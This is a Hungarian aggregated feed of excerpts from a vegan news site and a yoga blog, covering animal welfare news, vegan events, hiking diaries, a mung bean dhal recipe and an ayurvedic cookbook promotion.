2024. november 25. Prove - a világ vegán szemmel
Nem szolgálnak fel több libamájat vagy abból készült ételt Pessac városának önkormányzati fenntartású intézményeiben és rendezvényein. A tiltást állatjóléti indokokkal magyarázta a konzervatív polgármester. Idén Pessac városa a harmadik, amely a libamáj betiltása mellett döntött, országosan pedig már több mint egy tucat francia városban él ilyen tiltás. Valószínűleg nem a Márton-napi ünnepségekhez időzítették a döntést… The post Újabb francia város tiltja be a hízott libamájat appeared first on Prove.hu.
Heti egy húsmentes nappal is jelentősen csökkenhet a karbonlábnyoma, amiben egy finn alkalmazás is segít
Gyakran dob ki ételeket és szinte minden nap autóval jár dolgozni? Ha ezekre a kérdésekre igen a válasza, akkor lesújtó eredményekre számíthat a finn életmódteszten, de néhány javaslat elfogadásával könnyedén javíthat a szén-dioxid-kibocsátásán. Magyarország egyelőre nem kért az alkalmazásból, de az európai verzió mindenki számára elérhető.
Mészárlást rendeltek el egy megyében, madarak ezreivel végeznek
2024. november 16. Prove - a világ vegán szemmel
Madárinfluenza miatt adta ki az utasítást a Nébih, hogy 60 ezer állattal végezzenek egy tenyésztyúktelepen, Komárom-Esztergom vármegyében. Immár nyolc vármegyében igazolták a vírus jelenlétét. A járványhelyzet az Európai Unión belül Magyarországon a legrosszabb. Mintegy 60 ezer állatot tartó tenyésztyúktelepen merült fel a napokban madárinfluenza gyanúja a Nemzeti Élelmiszerlánc-biztonsági Hivatal (Nébih) beszámolója szerint. A Komárom-Esztergom vármegyei… The post Mészárlást rendeltek el egy megyében, madarak ezreivel végeznek appeared first on Prove.hu.
Edukáció és inspiráció a vegán cégeknek: érkezik a negyedik Növényi Konferencia
2024. október 26. Prove - a világ vegán szemmel
2024. október 30-án negyedjére szerveznek Növényi Konferenciát. Magyarország első számú innovatív, növényi alapú élelmiszer-ipari eseményén, melynek idén a Prove is kiemelt támogatója, az edukáció áll majd a középpontban. Ezúttal is a METRO Gasztroakadémia ad otthont Magyarország egyetlen olyan konferenciájának, amelynek célja a növényi alapú trend követése, előremozdítása és színesítése. A rendezvényen, amely idén elsősorban az… The post Edukáció és inspiráció a vegán cégeknek: érkezik a negyedik Növényi Konferencia appeared first on Prove.hu.
Megfúrhatja az EU a szintetikus húsalternatívák magyarországi tilalmát
2024. október 25. Prove - a világ vegán szemmel
Az Európai Bizottság válaszokat vár Magyarországtól a szintetikus húsalternatívák betiltása kapcsán. A magyar törvényjavaslat első körben nem ment át az uniós rostán, mivel a Bizottság megalapozatlannak tartja azt. Sok tagállam vezetője is aggályosnak találta a tervezett tilalmat. Többen is leszögezték, hogy a tervek a szabad kereskedelem elveivel ellentétesek. Az Európai Bizottság indokolatlannak és az egységes… The post Megfúrhatja az EU a szintetikus húsalternatívák magyarországi tilalmát appeared first on Prove.hu.
A patkányok és a helyhiány miatt ódzkodunk a komposztálástól
2024. október 10. Prove - a világ vegán szemmel
Magyarországon még mindig nem tekinthető elterjedt hulladékkezelési módszernek a komposztálás, pedig környezetvédelmi és anyagi haszna is lenne. A lakosság túlnyomó része azonban helyhiányra, a rágcsálóktól való félelemre és a szükséges háttértudás hiányára hivatkozva nem él ezzel a lehetőséggel. Mindannyian tisztában vagyunk azzal, hogy a főzésből visszamaradt zöldséghéjaknak, konyhai szerves hulladéknak a kuka helyett jobb helye… The post A patkányok és a helyhiány miatt ódzkodunk a komposztálástól appeared first on Prove.hu.
Árvízi készültségben az állatmentők - lassan lecsengenek a csendesebb napok
2024. szeptember 18. Prove - a világ vegán szemmel
Összefogtak a magyarországi állatvédők, hogy minél olajozottabb legyen idén az árvízi állatmentés. Szakértők szerint hatalmas áradás várható, így önkéntesek és ideiglenes befogadók jelentkezését is örömmel fogadják az állatmentő szervezetek és menhelyek. Látva, hogy az árvíz milyen pusztítást végzett Ausztriában, Csehországban és Lengyelországban, Magyarország is nagy erőkkel készül az elkerülhetetlenre. Budapesten lezárták a Margit-szigetet és a… The post Árvízi készültségben az állatmentők - lassan lecsengenek a csendesebb napok appeared first on Prove.hu.
Újabb vegán étterem zárt be, ezúttal a szombathelyiek bánkódhatnak leginkább
2024. szeptember 3. Prove - a világ vegán szemmel
A Govinda étteremlánc egyik étkezdéje, Szombathely egyik tisztán növényi alapokon működő étterme szeptembertől már nem fogad vendégeket. A hely üzemeltetői a döntést ,,gazdasági és személyi okokkal magyarázták. Nyár elején számoltunk be arról, hogy a bezárás mellett döntöttek egy növényi alapú ételeket kínáló budapesti étterem, az Édeni Vegán tulajdonosai. Szintén idén, négy év működés után a… The post Újabb vegán étterem zárt be, ezúttal a szombathelyiek bánkódhatnak leginkább appeared first on Prove.hu.
Isten éltessen Magyarország
2024. augusztus 20. Élj harmóniában
A mai nap egy szóval jellemezve... áldás Isten éltessen Magyarország Hihetetlen milyen szép kilátásai vannak kicsiny hazánknak A mai útvonaltervnél továbbra is figyelembe vettem, hogy az előző napi esőzések után, olyan útvonalon menjünk, ahol nincs sár és nincs túl sok pára. Továbbá, ha már kicsiny hazánk alapításának évfordulója van, hát ami belefér, had lássunk minél többet ebből a csodás országból Így terveztem végül mára az alábbi útvonalat... Dobogókő, Fekete-kő, Pilis-tető, Pilisszántói- kőfülke és Pilisszántó Boldogasszony Kápolna. Ez az útvonal amolyan kedvencem, mert hihetetlenül sok szép panorámában bővelkedik, szinte a Pilis hegységből minden irányba szét lehet nézni és nem csak a hivatalos kilátópontoknál, de sokszor a fák között lesve apró részletekben is lehet szépséget látni. Ráadásul nagyon nagy vágyam volt ma látni a pilisszántói Boldogasszony kápolnát, ami egy fantasztikus energiájú szakrális hely és mellette Makovecz Imre egyik izgalmas alkotása. Utunkat gyönyörű égi fények kísérték végig.. a felhők és a nap egymással folytatott táncának erdménye, amolyan égi áldásnak tűnt már a túra kezdetén is. Majd amikor folyamatosan hallottuk, hogy dörög az ég és hol jobbról, hol balról jöttek feketés fellegek kezdünk aggódni... már azon gondolkodtam, hogyan módosítsam a tervet és fájt a szívem, ha ma nem jutok el a kápolnához... de lám valamiféle égi csodának, Isteni gondoskodásnak köszönhetően nekünk néhány frissítő cseppen kívül semmi nem jutott az esőzésekből... Áldás volt ennyi szépet látni Magyarországból és áldás volt a napot a Boldogasszony kápolna atmoszférájával, hangulatával zárni. Kiegészítés... Akik ismernek tudják, Imádom ezt az országot fantasztikus a klímája, se nem túl hideg, se nem túl meleg barátságosak az élőlények - nálunk nem nagyon vannak gyilkos élőlények a hegyeink élettel teliek - nincsenek sziklás hófedte hegycsúcsok , ahol már nincs élet csodásak a tájaink és bebarangolhatóak nagyon sok thermál vizünk és fogyasztásra alkalmas vízünk van jó a termőtalajunk nagyon jó a földrajzi elhelyezkedésünk mélyek a történelmi és kulturális gyökereink És még lehetne sorolni... Látom a tendenciát arra, hogy sokan utálják az országot és elhagyják vagy biztatják a családtagjaikat, hogy tegyék meg. A politikai vezetést nem célszerű azonosítani a hazánkkal. Én nem politizálok, inkább csak szeretnék jobb ember lenni és jobbá tenni ezt a világot. Jómagam Szókratésszel értek egyet, így nem járok szavazni se. De sajnálom amikor valaki ego vagy pénz vagy politika vagy gazdasági megfontolásból itthagyja ezt a csodát. A politika néhány év vagy évtized... a döntés a következő generációk jövője, életkörülményei és gyökerei. Hálás vagyok az őseimnek, hogy nem hagyták el ezt a szépséges országot a nehézségek ellenére sem, és itt nőhettem fel, itt élhetek. Értem azt, aki ezt nem szereti és más klímára , tájra vágyik. Azokat viszont sajnálom akik ezen szuper dolgokat elhagyták és a családjuk következő nemzedékeinek lehet, hogy jobb anyagi körülményei lesznek, de nem ezen a csodahelyen élnek majd. Ha lenne egy ősi családi földbirtokom, csak azért mert a szomszédba valami dilis albérlő költözik néhány évre, aki számomra zavaró, nem hagynám el hiphop... a haza nem egy két választási ciklust jelent, hanem táptalaj és gyökerek a múltnak és jövő nemzedékének... egy nép, egy ember, de még egy fa stabilitását is a gyökerek adják
Kutyát fogadnál örökbe? Ezekkel légy tisztában, mielőtt belevágnál!
2024. augusztus 17. Prove - a világ vegán szemmel
Sokan döntenek egy kutya örökbefogadása mellett, különösen az olyan különleges alkalmakkor, mint az otthontalan kisállatok világnapja. A gyakorlati problémákkal és összecsiszolódási nehézségekkel szembesülve azonban meghátrálnak, a négylábú pedig ismét a menhelyen köt ki. A pénzért - törzskönyvvel vagy törzskönyv nélkül - vásárolt kutyák aránya (28,4 százalék) viszonylag alacsony a más módokon ,,megszerzett ebekéhez képest Magyarországon.… The post Kutyát fogadnál örökbe? Ezekkel légy tisztában, mielőtt belevágnál! appeared first on Prove.hu.
Állami szerv szűrte ki az állatkísérleteket kritizáló kommenteket, ráfaragott
2024. augusztus 14. Prove - a világ vegán szemmel
Egy washingtoni fellebbviteli bíróság ítélete szerint jogellenesen nem engedte az amerikai Nemzeti Egészségügyi Intézet, hogy állatkísérletek ellenzői szóljanak hozzá a posztjaihoz. Az állami szerv azzal érvelt, hogy a témába nem vágó kommenteket próbálta csak egy szűrővel elrejteni a nyilvánosság elől. A bírák szerint azonban ez a magyarázat sántít, és a szólásszabadsági joguk gyakorlásában akadályozták az… The post Állami szerv szűrte ki az állatkísérleteket kritizáló kommenteket, ráfaragott appeared first on Prove.hu.
Lótuszvirágzás
2024. augusztus 6. Élj harmóniában
Lótuszvirágzás... szerencsés dolog, hogy itt Magyarországon lehetőségünk van lótuszvirágzást nézni Vannak helyek a világon, , ahol ez egy mindennapi természetes látvány, de nekünk itt ritka csoda:) S persze nem csak lótusz, de megannyi csodás növény is virágzik így augusztus elején és teljes pompájában mutatja meg magát... A virágok, fák, bokrok mézédes, pikáns, fanyar és mindenféle különleges illatokkal vonzák magukhoz az élőlények figyelmét. . Varázslatos a természet Ha teheted ne hagyd ki ezt a páratlan lehetőséget a Vácrátóti Arborétumban. csodás nyári napokat:) szeretettel Kati
Létrejött a törvénytervezet, betiltaná a kormány a szintetikus húsalternatívákat
2024. július 9. Prove - a világ vegán szemmel
Társadalmi vitát kezdeményezett az Agrárminisztérium arról, szükséges-e a lakosság szerint a laboratóriumi hús betiltása. A kormány még idén lépne ebben a kérdésben, a szintetikus hústól való elzárkózást szerintük egészségügyi, környezetvédelmi és hagyományőrzési szempontok is indokolják. A Prove-nak nyilatkozó szakértők szerint azonban valójában jelenleg még nem áll rendelkezésre megfelelő mennyiségű adat a laboratóriumi húsokkal kapcsolatban. Korábban… The post Létrejött a törvénytervezet, betiltaná a kormány a szintetikus húsalternatívákat appeared first on Prove.hu.
Vizsgálat indulhat a Master Good ellen: ,,messzire ment a megtévesztés terén, állítják az állatvédők
2024. június 29. Prove - a világ vegán szemmel
A Gazdasági Versenyhivatalhoz fordult jogorvoslatért a Magyar Vegán Egyesület (MAVEG) és az Una Terra Alapítvány a Master Good megtévesztőnek ítélt reklámkampánya miatt. Az állatjogi és környezetvédelmi munkát végző alapítvány kuratóriumának elnöke, Nagy Ervin szerint biztosan felül kell majd vizsgálni, hogy a hazánkban érvényben lévő reklámtörvény mennyire felel meg a zöldmosásra (greenwashing) és annak társadalmi hatására,… The post Vizsgálat indulhat a Master Good ellen: ,,messzire ment a megtévesztés terén, állítják az állatvédők appeared first on Prove.hu.
Elhunyt John McDougall orvos és író, a növényi étrend kiemelkedő szószólója
2024. június 27. Prove - a világ vegán szemmel
John McDougall amerikai orvos különösen a keményítőben gazdag, növényi eredetű ételek egészségmegtartó hatásában hitt. 18 éves korában történt súlyos agyvérzésére az őt kezelő orvosok nem találtak magyarázatot. Ő azonban utólag az akkori táplálkozását - a sok hot dogot, sajtos pizzát és tojást - tartotta a legfőbb kiváltó oknak. Otthonában, békés körülmények között, 77 évesen lelt… The post Elhunyt John McDougall orvos és író, a növényi étrend kiemelkedő szószólója appeared first on Prove.hu.
Mátra ... Ilona völgyi vízesés , panorámás hegytetők, csodálatos rétek
2024. június 22. Élj harmóniában
Mátra... életem során többször is megfordultam itt... néha alkalmi túrák miatt és volt hogy nyaralások alkalmával, Idén 2024-ben itt tartjuk majd a Nyári Jóga Elvonulásunkat, ahol szép, ltványos túrákra viszem majd a csapatot. A nagy meleg miatt, tegnapra olyan túraútvonalat terveztünk, ami lehetőséget adott elkerülni a hatalmas hőséget. Az Ilona völgyi vízesés, Magyarország legnagyobb természetes vízesése és kiváló egy kis hűsölésre. A környező hegyekről, pedig csodás a panoráma a Kékesre és a környező tájra. Páratlan élményet nyújtottak a megannyi féle színes és illatos vadvirágok. Nyáron általában úgy tervezem a túrákat, hogy elkerüljük a meleget... patak mentén, völgyekben, vízeséseknél, hegyek északi oldalán kirándulnunk. Lévén panoráma mániás vagyok, hosszútávon nem vonzó számomra völgyekben gyalogolni, nézni a fák gyökerét, jobban kedvelem a napsütötte, virágos, színes, panorámás hegytetőket. Így most is részben bevállaltuk a meleget, a tűző napot, de megérte. Válaszd a nyári hőségben a hegyek nyújtott hűvösebb, kellemesebb környezetet:)
Megszólalt az élve megperzselt disznó Budapesten, az állatjogi világnapon
2024. június 6. Prove - a világ vegán szemmel
Megemlékeztek a kizsákmányolt állatokról az állatjogi világnap alkalmából a Vegán Aktivisták Magyarország Egyesület tagjai. A budai Várnegyedben hívták fel a figyelmet az állatok szenvedéseire. Az érdeklődők között pedig olyan is volt, akit megríkattak a hallottak. Immár harmadik alkalommal tartottak megemlékezést Magyarországon a nemzetközi állatjogi világnap apropóján. Az esemény budapesti szervezését a Vegán Aktivisták Magyarország Egyesület… The post Megszólalt az élve megperzselt disznó Budapesten, az állatjogi világnapon appeared first on Prove.hu.
Aki a szívével kutatta a csimpánzokat - Jane Goodall-kiállítás nyílt Budapesten
2024. április 26. Prove - a világ vegán szemmel
Július közepéig tekinthető meg a Magyar Természettudományi Múzeumban a Jane Goodall-kiállítás, amely a híres etológus életútját mutatja be. A neves kutató alapjaiban változtatta meg azt, ahogy akár az átlagemberek, akár a tudományos munkát végzők a csimpánzokról gondolkodnak. Manapság pedig gyakran hívja fel a figyelmet arra, mi mindent lehetne és kellene tenni a klímaváltozás megfékezéséért. Kerek… The post Aki a szívével kutatta a csimpánzokat - Jane Goodall-kiállítás nyílt Budapesten appeared first on Prove.hu.
Félre az illúziókkal: ilyen sovány, kopasz tojótyúk ,,adja a magyar tojást
2024. április 10. Prove - a világ vegán szemmel
Soha nem látott korábban napfényt vagy füvet az a tizennégy lesoványodott, kizsigerelt tojótyúk, akiket a Junior Kisállat Rezervátum mentett meg a tojásiparból. Az üzemekben ez sokszor általános állapotnak tekinthető. Az Európai Unió pedig az állatjóléti intézkedésekkel kapcsolatban még mindig hezitál. Csont és bőr - sokszor nevezik így azokat, akik nagyon soványak. A Junior Kisállat Rezervátum… The post Félre az illúziókkal: ilyen sovány, kopasz tojótyúk ,,adja a magyar tojást appeared first on Prove.hu.
Ezekkel a vegán édességekkel készülhet a húsvéti nyuszi
2024. március 30. Prove - a világ vegán szemmel
Már a magyar piacon is sokféle vegán húsvéti édesség megtalálható: csokinyuszi, csokitojás és nyuszis gumicukor is beszerezhető növényi alapokon. De akár házilag is elkészülhetnek - részben vagy egészben - a húsvéti finomságok. Néhány évvel ezelőtt még komoly fejtörést okozott a vegán családokban, mivel is lepheti meg a gyerekeket a húsvéti nyuszi. Nem is olyan régen… The post Ezekkel a vegán édességekkel készülhet a húsvéti nyuszi appeared first on Prove.hu.
Vegán aktivista került fel a Forbes rangos sikerlistájára - interjú Vida Raullal, a Prove alapítójával
2024. március 5. Prove - a világ vegán szemmel
Először került fel vegán szakember a mértékadó Forbes magazin magyar szerkesztőségének egyik listájára - Vida Raul személyében. Megjelenése az idei ,,30 sikeres magyar 30 alatt kategóriában nemcsak neki jelent elismerést, de a hazai vegán aktivizmus egyre szélesebb társadalmi elfogadottságára is bizonyítékul szolgálhat. A Prove mindössze 25 esztendős alapítójával személyes érzésein, valamint újabb tervein túl a… The post Vegán aktivista került fel a Forbes rangos sikerlistájára - interjú Vida Raullal, a Prove alapítójával appeared first on Prove.hu.
A növényi étrend csökkentheti az alvási apnoe kialakulásának esélyét
2024. február 27. Prove - a világ vegán szemmel
Egy friss kutatás szerint azoknál, akik teljes értékű növényi étrenden élnek, kisebb eséllyel alakul ki alvási apnoe. A teljes értékű növényi étrend csökkenti a gyulladást és segít a súlyvesztésben, ez lehet a magyarázat a pozitív eredményekre. Az ausztráliai Flinders University kutatói arra a következtetésre jutottak, hogy a teljes értékű növényi étrendet fogyasztók kevésbé vannak kitéve… The post A növényi étrend csökkentheti az alvási apnoe kialakulásának esélyét appeared first on Prove.hu.
Medvét lőttek ki az olasz hatóságok: a magyarázat egészen szürreális
2024. február 20. Prove - a világ vegán szemmel
Tüntetések pattantak ki az Olaszországban kilőtt medve miatt. Az Enpa állatvédő szervezet boncolási kérvényt nyújtott be, mert attól tartanak, indokolatlan kegyetlenséggel, kábítás nélkül végeztek az állattal. Ismét háborognak az olasz állatvédők. Tavaly a Progetto Cuori Liberi (Szabad szívek projekt) nevű menhelyen - hatósági utasításra - kivégzett tíz disznó miatt gyászoltak és tüntettek az olasz állatbarátok.… The post Medvét lőttek ki az olasz hatóságok: a magyarázat egészen szürreális appeared first on Prove.hu.
Egész mungóbab leves - zöld mung dhal
2024. február 12. Élj harmóniában
A blogon már több dhal receptet is olvashattál. A dhalok sűrű hüvelyesből készült leves félék, melyek nagyon táplálóak, magas a fehérjetartalmuk és a húsmentes táplálkozás fontos alapját képzik. Magyarországon elsődlegesen a mungóbab zöld változatát lehet kapni - ahol a külső réteg még rajta van a hüvelyesen. A blogra már több mung dhal receptet is kitettem, amik a zöld külső réteg eltávolítása után maradt belső sárga babból készülnek -ez a legkönnyebben emészthető hüvelyes. Gondoltam itt az idő megismeretnem veletek a zöld változatot. Szoktam használni a zöl feles változatát is, ami a kettő közötti átmenet. A zöld mungóbab ájurvédikus megközelítésben fanyar és édes, ezért hűsítő energiája van és egy könnyebben emészthető hüvely fajta. Mindhárom doshára kedvezően hat. Hozzávalók 1 csésze zöld mungóbab 5 - 6 csésze víz 2 ek. ghí 1 tk. római kömény 1 tk. fekete mustármag 1/2 tk. asafoetida 5 currylevél frissen vagy szárítva 1 kis marék korianderlevél apróra vágva 1/2 tk. kurkuma 1 tk. masala por 1/2 tk. só Elkészítés Alaposan mosd meg a zöld mungóbabot és éjszakára áztasd be egy nagy tál vízbe. Reggel szűrd le és tedd oda egy egénybe a babot 4 csésze vízzel és forrald fel. Főzd közepes lángon, fedő nélkül 30 percig. Néha keverd meg néha, ne égjen le az alja. Majd 30 perc után tegyél hozzá még 1 csésze vizet és főzd tovább 15-20 percig, vagy amíg a bab meg nem puhul. Egy másik edényben melegítsd fel a ghít, majd tedd bele a mustármagot, a római köményt és az asafoetidát egy pillanatra Add hozzá a curry leveleket, koriandert, kurkumát és a masala port és keverd össze. A fűszerkeveréket tedd át a levesbe és add hozzá a sót és az utolsó csésze víz egy részét vagy egészét, attól függően, hogy milyen sűrűre szeretnéd a levest. Végül még 2 - 3 percig forrald. Chapatival , baszmati rizzsel, purival, vagy kenyérrel tálalhatod és friss korianderrel díszítheted a tetjét. Mindegyikhez találsz recepteket a blogon. Ha szeretnél az Egészséges és tudatos táplálkozásról többet tudni, szeretettel várlak Egészséges táplálkozás és főzőtanfolyamomra. https://www.eljharmoniaban.hu/tudatos-taplalkozas Jó étvágyat kívánok :) szeretettel: Kati #mungóbab #mungdhal #recept #vegetáriánus #vegán #gluténmentes #tejmentes #leves #dál #dhal #hüvelyes
Kókusztejes, csicseriborsós ragu - vegán, gluténmentes recept
2024. január 20. Prove - a világ vegán szemmel
A fűszeres, ázsiai jellegű ételek elkészítése a növényi alapú konyhában szinte elengedhetetlen. Ez a kókusztejes, csicseriborsós ragu jó alapot nyújthat ehhez: nem bonyolult az elkészítése, a végeredmény pedig nem annyira fűszeres, ami erős lenne a magyar ételekhez szokott ízlésnek. Ezt az ételt nyugodtan elkészítheted, ha olyasvalakit akarsz lenyűgözni, aki nem tud elképzelni egy jó fogást… The post Kókusztejes, csicseriborsós ragu - vegán, gluténmentes recept appeared first on Prove.hu.
10+1 vegán sportoló, aki elérte a lehetetlent - magyarok is vannak köztük
2024. január 8. Prove - a világ vegán szemmel
Ma már a sportolók között is kevésbé számít tabunak a növényi alapú táplálkozás. Ehhez persze a csúcson járók adják a legjobb példát és ösztönzést - ha nekik sikerült, ugyan miért ne sikerülhetne másnak is? Egyre népesebb a vegán sportolók tábora, így mi is készíthettünk egy friss listát - anélkül, hogy a korábbi összeállításunkból egyetlen nevet… The post 10+1 vegán sportoló, aki elérte a lehetetlent - magyarok is vannak köztük appeared first on Prove.hu.
Puskás-Dallos Peti és Kovács Panka is arra ösztönzi a magyarokat: legyenek vegánok egy hónapra!
2023. december 27. Prove - a világ vegán szemmel
2023. december 27. - Ötödik alkalommal kerül megrendezésre 2024-ben hazánk egyik legnépszerűbb nonprofit, ingyenes kihívása, a Veganuár. Az évek során már több mint 81.000 magyar döntött úgy, hogy a mozgalom részeként kipróbálja a vegán életmódot egy hónapra, melyhez a Veganuár több száz vegán receptet, részletes cikkeket, napi tanácsokat és egy 23 ezer fős támogató közösséget… The post Puskás-Dallos Peti és Kovács Panka is arra ösztönzi a magyarokat: legyenek vegánok egy hónapra! appeared first on Prove.hu.
Magyar Guinness-rekord született egykezes húzodzkodásban
2023. december 18. Prove - a világ vegán szemmel
Arany-Tóth Levente egyetlen perc leforgása alatt huszonöt alkalommal hajtott végre szabályos egykezes húzódzkodást, ezzel pedig bekerült a Guinness-rekordok Könyvébe. A 18 éves vegán testépítő harmadik alkalommal futott neki a rekorddöntésnek, és sikerrel teljesítette is a kitűzött célt. Levente az élő bizonyíték arra, hogy a növényi étrend is tökéletesen alkalmas világklasszis sikerek eléréséhez. Aki rákeres, hogy… The post Magyar Guinness-rekord született egykezes húzodzkodásban appeared first on Prove.hu.
,,A növényi étrend korlátaival igenis foglalkozni kell - interjú Tóth Gáborral, azaz Bio Gabival
2023. december 12. Prove - a világ vegán szemmel
Tóth Gábor - Bio Gabi - a növényi étrend elkötelezett híve. Tudományos írásai, elvei és saját gyártású termékei a tápanyagok hasznosulásának és felszívódásának maximalizálását célozzák meg. A magyar közönség leginkább Bio Gabiként ismeri Tóth Gábort. Sebestyén Balázs, Vadon Jani és Rákóczi Ferenc visszatérő vendégeként gyakran beszélt a rádióban is a növényi étrend előnyeiről. Gábor élelmiszeripari… The post ,,A növényi étrend korlátaival igenis foglalkozni kell - interjú Tóth Gáborral, azaz Bio Gabival appeared first on Prove.hu.
Ezt gondolják a Facebook-felhasználók az éghajlatváltozásról
2023. november 27. Prove - a világ vegán szemmel
Száznál is több ország közösségi médiás felhasználóit kérdezték az éghajlatváltozással kapcsolatban. A felmérés pontosabb képet fest a Facebook-felhasználók klímaváltozással kapcsolatos elképzeléseiről, véleményéről, vélekedéseiről. Megtudtuk, hogy a magyar emberek például nagyon tájékozottnak tartják magukat a kérdést illetően. A Yale Program on Climate Change Communications a Metával együttműködve kutatta a közösségi média felhasználóinak klímaváltozáshoz fűződő viszonyát. Azért… The post Ezt gondolják a Facebook-felhasználók az éghajlatváltozásról appeared first on Prove.hu.
Steiner Kristóffal és Giannival erősített Magyarország első számú növényi konferenciája
2023. november 15. Prove - a világ vegán szemmel
Harmadik alkalommal került megrendezésre az a Plant Powered Perspectives névre hallgató konferencia, amely a növényi alapú élelmiszereket gyártók, forgalmazók és felhasználók számára kínál találkozási lehetőséget. A két főszervező, a NÉGYOSZ (Növényi Alapú Élelmiszereket Gyártók és Forgalmazók Országos Szövetsége) és a VBC (Vegan Üzleti Kör) ezúttal is a hazai vegán közösség számára kívánt továbbfejlődési alternatívákat mutatni.… The post Steiner Kristóffal és Giannival erősített Magyarország első számú növényi konferenciája appeared first on Prove.hu.
Vegán tejfölrecept TÉNÉ opcióval
2023. október 27. Prove - a világ vegán szemmel
Ez a vegán tejfölrecept tökéletesen helyettesíti a hagyományos változatot, így nem kell lemondanod a magyaros ízekről akkor sem, ha nem fogyasztasz tejtermékeket. Ha még nem készítettél hasonlót, nem kell megijedni, semmilyen bonyolult konyhai műveletről nincs szó: a vegán tejföl elkészítése mindössze néhány perc aktív munkát és egy késes aprítót vagy botmixert kíván. Az alapváltozat mellett… The post Vegán tejfölrecept TÉNÉ opcióval appeared first on Prove.hu.
Élen jár az élelmezési rendszer növényi reformja Dániában, Magyarország nem tervez hasonló lépéseket
2023. október 20. Prove - a világ vegán szemmel
Dán kormányzati terv született a növényi alapú élelmezési rendszer kialakítására. A magyar Agrárminisztérium lapunknak azt jelezte, egyelőre nem tervezik a növényi ágazatok felé terelni az állattenyésztőket. Nemzeti cselekvési tervet tett közzé a dán kormány, amely azt vázolja fel, miként állhat át az ország fokozatosan a növényi alapú élelmiszerrendszerre. Erre nemzetközi szinten sem volt még példa,… The post Élen jár az élelmezési rendszer növényi reformja Dániában, Magyarország nem tervez hasonló lépéseket appeared first on Prove.hu.
A magyar fiatalok 73 százaléka nyitott a növényi alternatívákra
2023. október 11. Prove - a világ vegán szemmel
Egy felmérés alapján a magyar fiatalok 73 százaléka fogyaszt rendszeresen olyan terméket, amely a növényi alternatívák kategóriájába sorolható. A Danone Magyarország pedig ennek apropóján flexitáriánus konferenciát rendez a Debreceni Egyetemmel karöltve. A Danone ugyan elsősorban a hagyományos tejtermékeiről ismert, az elmúlt években azonban a vállalat egyre jobban nyit az új trendek irányába. Ennek keretén belül… The post A magyar fiatalok 73 százaléka nyitott a növényi alternatívákra appeared first on Prove.hu.
A magyaros kolbász, amiben biztos nincs szemét, de hús se
Egy átlagos magyar évente körülbelül 80 kiló húst eszik. Bár egyre többen igyekeznek visszaszorítani a húsfogyasztásukat, sokaknak hiányoznak a hagyományos ízek. Őket célozzák a mezőhegyesi családi vállalkozás, a Vega-Farm termékei. Vajda Ferencné tíz éve otthon kezdett el vegán kolbászokat készíteni, lánya Walesből költözött haza, hogy közösen építsék fel az új üzemet.
Balaton, a Magyar tenger közelről, távolról, távolabbról...
2023. szeptember 7. Élj harmóniában
Balaton, a Magyar tenger közelről, távolról, távolabbról... nem lehet megunni... nem tudok betelni a hegyek és a víz látványának megannyi csodás kombinációjával... a látvány, formák, szinek, fények... évről évre járok ugyanazon helyeken, s még mindig új élményekkel tölt el ... még egy egy tájegységet, területet sem sikerült kiismerni sok sok év alatt... nemhogy egy országot... Egy Vörösmarty idézet jut eszembe... "Ne nézz, ne nézz h?t vágyaid távolába; egész világ nem a mi birtokunk; Amennyit a szív felfoghat magába, sajátunknak csak annyit mondhatunk." Ma a vágyak özöne önti el az embereket, mit kell megvenni, hová kell utazni... a boldogság nem azon múlik mennyi vágyad van, hanem azon a szíved mit fogott fel mag?ba A boldogság receptje kevesebb vágy és több tudatosság a jelen pillanat megélésében. szeretettel Kati
Kóstolj bele az ájurvédába!
Itt megrendelheted! A Kóstolj bele az ájurvédába című szakácskönyv a természetes gyógymódként alkalmazott táplálkozás és az egészségmegőrzés ősi hagyományokon alapuló tudományába enged betekintést. Ez a több ezer éves tudás minden ízében ajándék a ma emberének. Az egyént helyezi a középpontba: sajátos testtípusunkra, egyéni jellemzőinkre, egyszóval ránk koncentrál. Különbözőségeinket és betegségeink eltérő kiváltó okait feltárva személyre szabott, természetes gyógymódot ajánl számunkra. Az ájurvéda rendszerében valódi értelmet nyer a mondás: ,,Ami az egyiknek gyógyszer, a másiknak méreg. Az ájurvédikus orvos számára a betegség állapota helyett az egyén eredendő, egészséges mivolta a kiindulópont, s ennek alapján állapítja meg a megfelelő étrendet és gyógymódot, amely ismét harmóniát teremt a beteg állapot helyett, illetve megőrzi meglévő egészségünket. Az ájurvéda szerint az egészség megőrzésének három alappillére van: a megfelelő táplálkozás (áhára), az egészséges életmód (vihára) és a gyógynövények használata (ausadhi). A Kóstolj bele az ájurvédába az első alappillérrel, a táplálkozással foglalkozik. Ízletes gyógyszereket, ínycsiklandó recepteket kínál mindazoknak, akik hétköznapjaikban, konyhájuk birodalmában is szeretnék alkalmazni az ősi tudást szeretteik és önmaguk egészségének megőrzése, visszanyerése érdekében. A recepteken túl bepillantást nyújt az ájurvéda gyakorlati fortélyaiba is, melyek segítségével könnyen megállapíthatjuk, milyen testtípussal rendelkezünk, s hogy melyek azok a megfelelő, egyénre szabott ételek, melyek testi-lelki harmóniát, maradandó egészséget biztosítanak számunkra. Mit találsz a könyvben? - Az ájurvéda alapjainak leírását - Az ájurvéda gyakorlati tanításait (a különböző testtípusok jellemzői, az ízek szerepe a gyógyításban, évszakok szerinti étkezés, ájurvédikus étrendek). - 70 kipróbált receptet, melyeket a főzésben kevésbé járatosak is el tudnak készíteni - Megismerheted a fűszerek használatát - Alaprecepteket (ghí főzés, indiai házisajt készítés) - Színes ételfotókat - A szerző tanácsait Mindezt 128 színes oldalon. Az ájurvédának létjogosultsága van Magyarországon, és ennek gyakorlatba ültetéséhez Hémangi hetedik szakácskönyve hatalmas segítséget jelent az egészségükre vigyázók részére. A már számos megjelent ájurvéda könyv mellett tanácsokat ad a különböző alkatú és korú embereknek az étkezés fontosságáról, annak összetételéről, a gyógyhatású fűszerekről, hogy betartható legyen az ,,Amit eszünk, azzá leszünk szlogen, amelyet már Hippokratész is átvett 2500 évvel ezelőtt Csarakától, a híres indiai ájurvéda orvostól. Riesz István Dr. (Ayu) Hon. A Magyar Ájurvéda Gyógyászati Alapítvány elnöke Ha teljeskörű, gyakorlati képzést szeretnél kapni az ájurvédikus konyhaművészetben, rendeld meg a könyv támájához kapcsolódó főzőtanfolyamot is. A könyvet itt rendelheted meg!
A magyar kreativitás nem ismer határokat: így ösztönöz gyümölcsfogyasztásra a pécsi férfi
Létezik egy kert, ahol feliratos alma terem. A ritka terméket a természet adja, annak kreatív és egyedi megjelenése apró trükkön múlik.
Illatmámor, varázslat
2023. május 28. Élj harmóniában
